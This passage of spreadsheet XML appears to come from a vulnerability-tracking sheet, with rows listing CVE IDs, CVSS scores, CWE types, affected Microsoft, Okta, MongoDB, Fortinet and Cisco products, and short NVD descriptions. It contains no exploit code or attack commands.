      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S242"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T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S245"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T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S246"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T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S247"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T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S248"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T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="S249"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T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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0" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
